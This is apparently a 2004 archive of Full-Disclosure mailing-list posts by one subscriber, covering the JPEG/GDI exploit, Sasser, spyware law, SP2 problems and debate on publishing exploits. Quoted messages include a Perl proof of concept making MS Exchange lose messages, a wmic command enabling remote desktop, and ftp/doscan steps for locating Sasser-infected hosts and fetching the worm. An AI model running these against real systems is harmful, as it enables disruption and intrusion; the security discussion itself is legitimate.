| own |needs, but use it at your own risk.
| |
| |Test can be downloaded from here:
| |http://www.guidoz.com/exploit-test.exe
| |
| |Again, it's just an SFX archive with a batch file. Hopefully it 
| will |save someone else some time. I've used it to have 
| friends/family (and |a few clients) patch a total of 
|around 30 machines without problems.
| |
| |--
| |Peace. ~G
| |
| |
| |--__--__--
| |
| |End of Full-Disclosure Digest
| |
| 
| Well, guess I'm safe. McAfee saw it as 
|Exploit-MntRedir.gen and said...NO!
| I googled it and it found nothing though. Thought it would atleast 
| lead me to McAfee. McAfee search said:
| 
| We found no records matching the following criteria:
| Virus name containing MntRedir.gen.
| Please try narrowing your search by using fewer characters.
| 
| What gives?
| 
| thank you
| Randall M
| 
| ___
| Full-Disclosure - We believe in it.
| Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Symantec Security Report 1V

[RandallM]

http://www.securityfocus.com/columnists/271
 
Very interesting and yet kinda scarry! Symantec gave their view on the trend
of internet attacks. I'd be very interested on the views from this list.
There is one area that is starting to concern me at my place of employment
and that is IM's. I delete them and the next day they're back. What I need
is some POC to show the bosses concerning the vulnerabilities associated
with them. Which I believe is a trend that will increase greatly.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] House approves spyware legislation

[RandallM]

  

The U.S. House of Representatives voted late Tuesday to restrict some of the
most deceptive forms of spyware. 

By a 399-1 vote, House members approved legislation prohibiting taking
control of a computer, surreptitiously modifying a Web browser's home page,
or disabling antivirus software without proper authorization. 

http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.h
tml?tag=nefd.top

 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] House approves spyware legislation

[RandallM]

|On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss 
|[EMAIL PROTECTED] wrote:
| Great, Not that I'm any fan of spyware, but this is just 
|another law 
| against hacking. Think - what's the difference between this and 
| someone using XSS to take control of a computer? If you 
|r00t a box 
| and deface the home page, then you've broken this law.
| 
| sigh Instead of fixing the problem (poor software 
|security) we pass 
| laws to punish the people who do the things that 
|illustrate the problem.
| Basic philosophical differences, blah blah blah ...
| 
| Worst of all, do you really think that the spyware rackets 
|will slow 
| down or cease because of this? Nope - they'll just migrate 
|out of the jurisdiction.
| 
| -- Greg
|End of Full-Disclosure Digest
|


I guess one has to decide if browser hijacking is not the taking of personal
property. I for one do not fine it amusing to open my browser and it has
been redirected to a hijacked page as my new Homepage!
If this law would allow me...the user to bring down hell upon these people
then I'm all for it.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs

[RandallM]

|--__--__--
|
|Message: 14
|Date: Wed, 6 Oct 2004 15:53:32 -0700
|From: GuidoZ [EMAIL PROTECTED]
|Reply-To: GuidoZ [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Quick JPEG/GDI test  fix (timesaver)
|
|Hello list,
|
|I wrote a very simple program/batch file that tests for the JPEG
|exploit, then if affected, provides instructions on how to patch the
|exploit. It has been tested on my own lil happy lab network, as well
|as one one network where I'm a sysadmin. (Tested on Windows XP Home
|and Pro, SP1a and SP2.)
|
|It DOES test for the exploit by attempting to use an infected JPG
|which downloads the instructions for fixing it, if exploited. By
|viewing the strings in the JPG, you can see the file it downloads and
|check it out for yourself. It's clean. =) Just contains a batch file
|and a program to launch the batch file. (The file that gets 
|downloaded
|is a simple SFX.) Links are below. It contains a warning saying it's
|about to try to exploit the system and to save data in open programs.
|(It also warns that Explorer may crash.)
|
|I wrote this merely to save myself time and allow friends/family to
|test their own systems, then patch them without having to call me for
|help. It's not been tested in every environment and in every 
|scenario.
|If you find a problem, feel free to email me (exploit _AT_ guidoz
|_DOT_ com) Obviously I'm not responsible if it's abused 
|somehow, or if
|it breaks something, etc. Feel free to modify it to suit your own
|needs, but use it at your own risk.
|
|Test can be downloaded from here: 
|http://www.guidoz.com/exploit-test.exe
|
|Again, it's just an SFX archive with a batch file. Hopefully it will
|save someone else some time. I've used it to have friends/family (and
|a few clients) patch a total of around 30 machines without problems.
|
|--
|Peace. ~G
|
|
|--__--__--
|
|End of Full-Disclosure Digest
|

Well, guess I'm safe. McAfee saw it as Exploit-MntRedir.gen and said...NO!
I googled it and it found nothing though. Thought it would atleast lead me
to McAfee. McAfee search said: 

We found no records matching the following criteria:
Virus name containing MntRedir.gen.
Please try narrowing your search by using fewer characters.

What gives?

thank you
Randall M

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE:[Full-Disclosure] XP Remote Desktop Remote Activation

[RandallM]

Would access to command shell be accomplished via the recent ZoneID hole if
such Administration password access is not available? Or perhaps even with
the launching
Of the MS04-028 exploit? Of course any Terminal usage on home pc's are
noticed because users
are locked out. Now terminal servers are a differnet story but user
intervention is still needed.

thank you
Randall M
 
 

|--__--__--
|
|Message: 3
|Date: Fri, 1 Oct 2004 23:50:45 -0500
|From: Fixer [EMAIL PROTECTED]
|Reply-To: Fixer [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
|
|--=_Part_505_31077403.1096692645033
|Content-Type: text/plain; charset=US-ASCII
|Content-Transfer-Encoding: 7bit
|Content-Disposition: inline
|
|XP Remote Desktop Remote Activation
|
|
|Information
|
|Windows XP Professional provides a service called Remote Desktop,
|which allows a user to remotely control the desktop as if he or she
|were in front of the system locally (ala VNC, pcAnywhere, etc.).
|
|By default, Remote Desktop is shipped with this service 
|turned off and
|only the Administrator is allowed access to this service.  It is
|possible, however, to modify a series of registry keys that may allow
|a malicious user who has already gained a command shell to activate
|Remote Desktop and add a user they have created for 
|themselves as well
|as to hide that user so that it will not show up as a user in the
|Remote Desktop user list.  The instructions for this are attached. 
|Additionally, I have listed a sample .reg file of the type that is
|discussed in the instructions below.
|_
|

SNIP

|--__--__--
|
|Message: 6
|From: Dominick Baier [EMAIL PROTECTED]
|To: 'Fixer' [EMAIL PROTECTED], 
|[EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation
|Date: Sat, 2 Oct 2004 17:43:11 +0200
|
|if you have an administrator password for the machine you 
|can just use WMIC
|to turn remote desktop on.
|
|wmic /NODE:Server /USER:administrator RDTOGGLE WHERE 
|ServerName=Server
|CALL SetAllowTSConnections 1
|
|End of Full-Disclosure Digest
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: horse before cart...I take it back

[RandallM]

Sorry for my stupidity and too quick response. After careful study I see its
the .DLL only. This exploit has me too excited! I am impressed though with
how quick the response to this has been. I have heard of view incidents. My
own ISP has finally implemented protection even from those files recieved
from the list. Personally I know of a high school here in Missouri that had
to shut down internet access due to this so they claim.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] WinXP Application Layer Gateway Service

[RandallM]

Is there anything fishy about this service performing background FTP
request?
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE:[Full-Disclosure] How to obtain hostname lists

[RandallM]

Fab,
One kewl way is to open a website like Nakedladies.com and log all the
visiting IP's!
Kewl huh! Do you need someone to write some code also?

thank you
Randall M
 
 

|--__--__--
|
|Message: 4
|Date: Tue, 28 Sep 2004 09:32:37 -0600
|From: fabio [EMAIL PROTECTED]
|To: Full-Disclosure [EMAIL PROTECTED]
|Subject: [Full-Disclosure] How to obtain hostname lists
|
|Hi.
|
|I would like to know what techniques can Intruders use to 
|obtain a lists of hostname and attack them with exploits code?
|For example, a huge list like:
|www.foo.com
|www.bar.com
|
|And so on. Also, they can have a lists with certain criteria 
|in common (os, httpdver) and do a more selective attack. I 
|want to know how they can obtain hostnames asnd create a 
|huge database for potencial host victims?
|
|Thanks in advance.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Need layman terms for jpeg exploit

[RandallM]

Would some kind soul explain the total workings of the exploit in layman
terms? Things like how it
Is used, how the user is xploited, what's common about the jpeg code that
must be
Used, etc., etc.
 
thank you in advance
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?

[RandallM]

What exactly would one gain by creating a PoC on this exploit?
How exactly does this compare to meaningful disclosures that were
revealed because someone would not listen or ignored the warnings
of their security vulnerability.

I mean, this is nothing like a program goof that allows clear-text
Passwords or exposes files or the like. This exploit (if it can be
called that) took a lot of thought to create it and exploit it.

Correct me if I'm wrong but it does not fall in to the category
of exploit as defined by this list. This was truly a created Exploit 
that would not be their otherwise. This took intelligent input.

This is nothing more then a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

|--__--__--
|
|Message: 13
|From: i.t  [EMAIL PROTECTED]
|Organization: i.t consulting
|To: [EMAIL PROTECTED]
|Date: Sun, 26 Sep 2004 11:57:33 +0200
|Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
|
|
| On Saturday 25 September 2004 16:59, raza wrote:
|  I just compiled this and it works well..
| 
| ...
| yes and it works very well.
|  I can see this ones gaana be fun...
| We'll have a worm within days.

|
|for nearly all of my clients using win xp I've deinstalled 
|win messenger.
|one urgently wanted it back for communicating in real-time; 
|and, of course, 
|it's much more fun seeing a live picture of the 
|counterpart(s) in the chat 
|window...
|
|even having installed sp2 and the newest patches plus AV I 
|can imagine a virus 
|spreading within those pictures throughout the whole msn and so on...
|any other defense?
|or ist this too much paranoia?
|
|i.t
|
|
|--__--__--

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [Full Disclosure] *HACKERS COSTING ENTERPRISES BILLIONS

[RandallM]

 

A report issued by Symantec found that:

The average time period between the disclosure of a vulnerability and its
first exploit by hackers collapsed from several weeks in past reports to
less than six days in the first half of 2004.

'In some cases, we saw global exploits in less than two days,' said Weafer.
The current report finds that the vast majority of those vulnerabilities
were moderately to highly severe and nearly 40% were associated with Web
applications.

This and some other findings from it's Internet Security Threat Report.
See
Security Wire Perspectives, Vol. 6, No. 72, September 20, 2004 for this and
other related
Material.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access

[RandallM]

Gentlemen,
I'm a little lost now on the intent of the original post. I believe it was
intending to say that IBM computers arriving with XP installations have
blank default Administrator passwords. 

I install about three fresh installs of XP and four pre-installs on HP
laptops a week. The retail version always asks for a password for the
local Administrator account and a user name. XP pre-installations require
a user name and no mention of Admin account though its there by default
with no password. Both by default give the user local administrator
rights. Once installed I have to go to the accounts area and supply the
passwords. If I join these to the domain I must supply a password. I've done
it this way for two years and nothing has changed. 

It seems then the IBM and HP by pass what fresh retail installations do, and
that is allow the opportunity to supply a password for the local
administrator. This would be then their problem. Retail version warns but
allows blank passwords. This would be the XP problem.

I take full responsibility for any mistakes above. It's late. I'm tired and
doing so many it does become mind numbing. But I believe this is an accurate
account of the installations.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] ZIP Attachment

[RandallM]

Nick, have some coffee, it'll be ok! :)
 
 
thank you
Randall M
 
+
--__--__--

Message: 10

Date: Sun, 19 Sep 2004 21:39:03 +1200

From: Nick FitzGerald [EMAIL PROTECTED]

Subject: Re: [Full-Disclosure] ZIP Attachment

To: [EMAIL PROTECTED]

Reply-to: [EMAIL PROTECTED]

Organization: Personal account

GuidoZ wrote:

 I'm well aware that a filename usually isn't a very useful tools when

blah, blah, blah...

Your first post was a total waste of bandwidth, this one doubly so. 

Your two minutes at Google were not worth the list's time and 

resources, yet after having the blindingly obvious pointed out to you, 

you had to compound that by posting a wacky justaficashun of your 

originally pointless message.

 

Regards,

Nick FitzGerald
++=
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: [Vmyths.com ALERT] Hysteria predicted for 'JPEG and windows update

[RandallM]

 
I'm curious if anyone else noticed that the patch to fix windows only
takes you to the SP2 update. We don't want the SP2 update because we have
not fully tested this against our office and accounting software. I tryed on
three different machines and each time the windows update for critical or
custom only allowed me to get the SP2 update, nothing else. Did I read
wrong? Did they not issue a patch?
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] (Full-disclosure) SP2 and McAfee. Has the final release been resolved?

[RandallM]

With the SP2 RC1 McAfee could not update dats. Framework could not start.
Had to set settings manually. 
Has this been fixed in the final version?
 
the settings:
 
To fix Virus scan 7.0
 
 *Run dcomcnfg from the DOS prompt
Select Component Services 
Select My Computer 
Open DCom config folder
Click no on the pop up dialog if it appears.
Select Framework Services 
Right click on properties and select Security tab. Change Launch to Use
default.
Click on Apply.
Close the windows
Run Update 
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] FullDisclosure: CWS removal tools

[RandallM]

I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunetly,
the author was a student and it seems no longer can support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes absolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
is some other useful links http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-

[RandallM]

Maarten,all,

I might add that security is a big part of this subject considering
cyber-war being implemented
From both sides. 

thank you
Randall M
 
 

|--__--__--
|
|Message: 6
|From: Maarten [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth 
|- what I want out of it
|Date: Thu, 22 Jul 2004 14:03:20 +0200
|
|On Thursday 22 July 2004 13:07, Harlan Carvey wrote:
|
| Consider this...this is a public list and people will
| knowing post off-topic.  Sometimes they'll even say,
| hey, this is off topic.  Now, what would happen if
| you were sitting around having a couple of beers w/
| your buddies and a friend of yours walked up and just
| started talking about something that hand nothing
| whatsoever to do with what you and your buds were
| talking about?  Would you be the one to do that to
| your friends?  How about a group of strangers?
|
|Except that in that social context you cannot really say there is no 
|moderation.  Moderation will not be official, sure, but body 
|language, 
|awkward looks and maybe a wisecrack or two will most of the 
|time quickly shut 
|up that person.  Or they will continue their conversation in 
|a smaller 
|circle, all things that are impossible or at least difficult 
|to do on a ML. 
|On a mailinglist you can continue off-list, but that is a one-to-one 
|conversation, not a fork like you can have in your bar scenario.
|Also, if the guy won't stop jabbing, you can all start to 
|leave and continue 
|elsewhere.  This doesn't happen on mailinglists, or at the 
|very least it is a 
|process that takes months to complete, instead of seconds.
|
|To steer a little bit back to on-topic, can we conclude that 
|all computer 
|systems in israel and the surrounding palestine territories 
|are insecure ?
|Because, since all real security begins with _physical_ 
|security, one can 
|easily argue that all those systems are notorously insecure.  ;-)
|
|Maarten
|
|-- 
|Yes of course I'm sure it's the red cable. I 
|guarante[^%!/+)F#0c|'NO CARRIER
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability

[RandallM]

So are there any problems or complications for enterprises when applying
this patch?
 
 
 
thank you
Randall M
 
 

Message: 3

Date: Fri, 02 Jul 2004 12:36:03 -0400

From: William Warren [EMAIL PROTECTED]

To: [EMAIL PROTECTED]

Subject: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability

http://support.microsoft.com/default.aspx?kbid=870669
http://support.microsoft.com/default.aspx?kbid=870669 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Successful in blocking all known exploits

[RandallM]

After a number of years, much thought,and  long nights I have developed a
systematic method to prevent and thwart exploits on my system!
 
NEVER REBOOT!
 
I have been up and running for 876 days straight and have had no problems to
date!
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Apology: Was Multiple Scanning Engines

[RandallM]

I do sincerely apologize for offending those who felt this was not the place
to 

ask such a question. I felt though that there was no better place then a
place

where the recipients were of high caliber and knowledge. A Google search
would

have only given me advertisements of We're the best type. For those who
through

kindness answered I thank you so much.

 

--__--__--

 

Message: 4

Date: Sun, 27 Jun 2004 11:29:38 +1200

From: Nick FitzGerald [EMAIL PROTECTED]

Subject: Re: [Full-Disclosure] multiple scanning engines

To: [EMAIL PROTECTED]

Reply-to: [EMAIL PROTECTED]

Organization: Personal account

 

RandallM [EMAIL PROTECTED] wrote:

 

 I looking for something that can utilize multiple scanning engines to

 place above our mail servers. Any suggestions?

 

Precisely how is this a security vulnerability disclosure issue?

 

Securityfocus has a focus-virus list and there are many other fora 

around the web for discussing whose antivirus is best type issues...

 

Please, no-one else reply to this _on list_.

 

 

-- 

Nick FitzGerald

Computer Virus Consulting Ltd.

Ph/FAX: +64 3 3529854

 

 

--__--__--

 

 

thank you

Randall M

 

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] multiple scanning engines

[RandallM]

Hi,

I looking for something that can utilize multiple scanning engines to place
above our mail servers. Any suggestions?

 

thank you

Randall M

 

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, SP2 Problems

[RandallM]

Jelmer made this really neat statement:
 
|--__--__--
|
|Message: 5
|Date: Mon, 07 Jun 2004 04:17:28 +0200
|From: Jelmer [EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary
|code
| (An analysis of the 180 Solutions Trojan)
|To: 'Chris Carlson' [EMAIL PROTECTED]
|Cc: [EMAIL PROTECTED]
|
|I haven't installed SP2 yet since I heard a lot of complaints from people
|who claimed it caused instability, it had memory management issues, some
|drivers didn't work, security measures a bit too much in your face etc
|
|But I reviewed the list of changes sometime back and I concur, it looks
|very
|promising, I think in the near future an IE exploit will be a rare
|occurrence as opposed to a bi weekly event
|
|End of Full-Disclosure Digest

My reply:

I have the sp2 after attending the Security Summit 2004. I loaded this on my
test laptop. Glad I did. I would have been very pissed if I had loaded it on
anything else.

First off, if you have McAfee or Norton you no longer are able to update
using auto. It for sure is for the home user. If you're expecting
something that you can have a little more control over this is not for you.
One thing that I was afraid of and concerned me due to my mobile users was
the ability to use VPN. It works well and does give you options to select
services for each connection you use.
It did not recognize my virus program being loaded nor give me the option to
point to it. I think that's due to the McAfee incompatibility in someway

I did look for a fix and found this but haven't tried it yet:
__
The McAfee framework issue is solved easily.
Administrative Tools
Component Service
DCOM conf
Framework service
Right-click - properties
Set the launch and access permission to Default
Restart pc. McAfee will update properly.
Seems to be an error in the McAfee installer


Then of course there seems to be a slue of areas from web programs to a
warning from Microsoft that SP2 will break and disrupt existing
applications unless specific code rewrites are made at the developer end.
http://www.internetnews.com/ent-news/article.php/3322381 

I'll test the above for McAfee fix and see if that works.

Randall M

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] xabot or sdbot or spybot...

[RandallM]

--__--__--

Message: 21
Date: Fri, 04 Jun 2004 00:08:23 +0200
From: Axel Pettinger [EMAIL PROTECTED]
Organization: API
To: Perrymon, Josh L. [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] anyone seen this worm/trojan  before?

Perrymon, Josh L. wrote:
 
 I found this worm/ trojan on a laptop. Ran FPort and found the .exe.
 Doesn't look like it propagates to other machines but rather communicates
 with a compromised
 web companies server using IRC. The compromised server has removed the
IRC
 service. Only sends RST packets back.
 
snip
 I would like to know the attack vectors. I'm guessing LSASS.

AntiVirus scanners identify our trojan as:

BitDefender : Backdoor.SDBot.Gen
Kaspersky   : Backdoor.Rbot.gen
McAfee  : W32/Sdbot.worm.gen.g 
Symantec: W32.Spybot.Worm 
Trend Micro : WORM_SPYBOT.AP

From a quick look at the file I'd say the following is the best 
description of that trojan. There're several attack vectors ...

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT
.APVSect=T

Regards,
Axel Pettinger



I'd like to throw something in here. While scanning with Spybot 1.3 it came
to a halt with an error. The error was an
Xabot error. After many attempts to figure this out I searched Xabot. This
lead to Symantics site 
http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html
and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is
associated with Sdbot. 

Well, for sure I am having a hell of a time finding it as all conventional
means have failed. 3 online scans. 3 scans in safe mode. Hijack This,
Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled
Spybot three times. It seems I have a remnant somewhere.

thank you
Randall M
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1675 - 32 msgs

[RandallM]

Yo! Skylined, don't hold back, tell us how you really feel!

|Message: 30
|From: Berend-Jan Wever [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] lists, autoresponders, and netiquette
|Date: Fri, 28 May 2004 03:42:40 +0200
|
|Every time I post to a list I get these out of office auto-responses.
|Can these responders be configured to not respond to stuff from a list?
|
|-Michael
|
|Yes, they can... and no, they won't. Too much shit-for-brains dumb-ass
|good-for-nothing mofo's on the list for that. Why the hell do you think
|every none informative troll thread is repied to at least 30 times?
|That's
|just because there are more people subscribed that get a hard on from
|annoying people (or are just plain stupid) then there are that get a hard
|on
|from actually contributing something.
|
|As a matter of fact I'm just replying because my girlfriend broke up with
|me
|and I'm drunk, else I wouldn't even bother: I just felt like being a
|shit-for-brains dumb-ass good-for-nothing mofo.
|
|Cheer,
|SkyLined

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Remember the subject about posting the exploit?

[RandallM]

Well, concerning the German Teenager who is responsible for releasing
sasser, Mitnick states:

 

He was no great technical expert. There was a published vulnerability and
he took his worm and used his exploit code to be able to propagate it in the
many systems that Sasser touched.  

 

http://www.zone-h.com/en/news/read/id=4245/ 

 

Just my point justified. A more protective measure must surely exist?

 

Like I said before I play counter strike. The kids 12-18 years old on there
know c+ like the back of their hand and brag about which university there
bots got into that day and the number of bots they own.

 

thank you

Randall M

 

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure New therad: sasser, costs, support etc alltogether

[RandallM]

QUESTION:

If a tree falls in the woods where no one is around to hear it does it make
a sound?

If there wasn't someone looking for bugs or exploits would there be any?


In a perfect world this list wouldn't exist.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how

[RandallM]

I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the exploit example because, in his
own words, 

|I think some people know how to use this FEATURE ...  I hope this post
|will speed up the fix release!

Exactly in what way do you think this should speed up the release? 

Granted, this is a lost email exploit. But what if it was a dangerous
exploit? I have seen these also posted.

I know of script Kiddies who would never be able to find the exploit but
are part of the group who know how to use this 'FEATURE' They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
Administrator I have no need for the exploit but for the knowledge. I have
found no better place then here for that. Then on the other hand you all
give out the exploits for confirmation which is needed also. Just some of my
personal inward ramblings.

thank you
Randall M
 

|--__--__--
|
|Message: 20
|Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
|From: [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] MS Exchange message lost
|
|* MS Exchange duplicate message fault (message lost)
|*
|* MS Exchange (all versions affected) duplicate message fault
|*
|* I discovered this bug independently on 10, 2003
|*
|* public post 05, 2004
|*
|* Helmut Schmitz  [EMAIL PROTECTED] 
|*
|* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */
|
|MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
|Messages with long message ids (189 bytes?)to more than one recipient
|(cc),
|the message will not delivered correctly ... there is no correct logging
|!!,
|the messages will be delivered to only one Recipient ... the message to
|the
|other will be lost !!
|
|I have send this issue to Microsoft (10.2003) ... some months later
|(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
|some reg settings fixes (workaround ;-) the problem.
|
|Perl Example (test exploit) ...
|
|#!/usr/bin/perl -w
|use Net::SMTP;
|$from = '[EMAIL PROTECTED]';
|$to = '[EMAIL PROTECTED]';
|$cc = '[EMAIL PROTECTED]';
|$subject = 'Test Email';
|$smtp = Net::SMTP-new('yourmailserver');
|$smtp-mail($from);
|$smtp-to($to);
|$smtp-cc($cc);
|$smtp-data();
|$smtp-datasend(To: $to\n);
|$smtp-datasend(Cc: $cc\n);
|$smtp-datasend(From:  $from\n);
|$smtp-datasend(Subject: $subject\n);
|$smtp-datasend(Message-ID:
|veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte
|ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
|eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
|feejktmhedgedherngrondljzhng \n);
|$smtp-datasend(Hallo\n);
|$smtp-datasend(123\n);
|$smtp-datasend(123\n);
|$smtp-datasend(123\n);
|$smtp-dataend();
|$smtp-quit;
|
|Background:
|Duplicate detection is decided by three factors.  These are MessageID,
|RootFID (the root folder ID of the mailbox) and the SubmitTime into the
|store.  These are used to build a unique key when the message is
|submitted.
|If all the factors are the same value, then we recognize the message as
|duplicate.
|
|###
|
|I think some people know how to use this FEATURE ...  I hope this post
|will speed up the fix release!
|
|Regards,
|Helmut Schmitz

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Registry Watcher

[RandallM]

Hi,

Any programs out there that watches changes to registry and can give an
alert? 

 

My intention for this is only because of my limited knowledge of the windows
registry. As I understand, no processes, applications, programs run with out
entries in to the registry. This it seems includes virus and Trojan
installations. There are the common entries that belong in the registry that
the common installation inserts and all programs have values that must be
inserted. If a watcher would have a data base to follow and any odd or
uncommon entries could be flagged. As far as I know all newly found viruses
insert registry entries and these could be placed in a data base that would
cause registry to deny and flag. Wouldn't this in a sense be a firewall and
virus protection method or am I really off base in my understanding. I know
that such use is used by AdWatch and other types of tools but I have never
seen anything mention for protection against backdoors, Trojans and viruses.
If such a program does not exist I'd appreciate any input on building one.

 

thank you

Randall M

 

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser

[RandallM]

Hot dam, can't wait to get to work and try this on our network!


|--__--__--
|
|Message: 19
|From: Shashank Rai [EMAIL PROTECTED]
|Reply-To: [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Organization: Etisalat NIS
|Date: Tue, 04 May 2004 11:40:12 +0400
|Subject: [Full-Disclosure] Catching Sasser
|
|Hi all,
|for people who did have not the priviledge of getting infected with
|sasser ;) because of firewall/AV/patch or they are smart enough to use
|Linux (like me hey now no flame war on this *please*), here is a
|simple way to catch sasser:
|
|Step 1:Scanning for infected machines (from a Linux box):
|-
|Get doscan from:http://www.enyo.de/fw/software/doscan/
|
|compile n run:
|# doscan -A 50 -b 512 -c 100 -i -p 5554 -P tcp -r 200 OK$ -v IP
|RANGE
|
|This will give you list of infected machines.
|
|Step Two: Getting the virus
|---
|Copy the following set of commands into a file (or type them from ftp
|prompt):
|-ftp_commands--
|open infected m/c IP 5554
|anonymous
|user
|bin
|get 7584_up.exe
|bye
|--
|then from cmd prompt of your *windows* machine, run:
|
|c:\ftp -s:ftp_commands
|
|This will fetch you a copy of the virus as 7584_up.exe.
|The ftp_commands, actually logs into the ftp server of sasser on port
|5554 of the infected machine with username anonymous and password
|user, and then issues a PORT command to download the virus.
|
|
|PS: USE THESE SET OF INSTRUCTIONS AT YOUR OWN RISK By EXECUTING THE
|DOWNLOADED FILE YOU WILL INFECT YOUR SYSTEM.
|
|In case you are running any AV with real-time protection features, it
|should immediately detect the virus!!!
|
|cheers,
|--
|Shashank Rai
|
|Network and Information Security Team,
|Emirates Telecommunication Corporation,
|Abu Dhabi, U.A.E.
|Ph: +971-2-6182523   Office
|+971-50-6670648  Cell
|GPG key:
|http://pgp.cns.ualberta.ca:11371/pks/lookup?op=vindexsearch=0x01B7947402
|6E36F5
|
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure YOU know what blows me away.

[RandallM]

You know what blows me away. People who can in one breath write the info
like youssef below and what other on this list have written. And that most
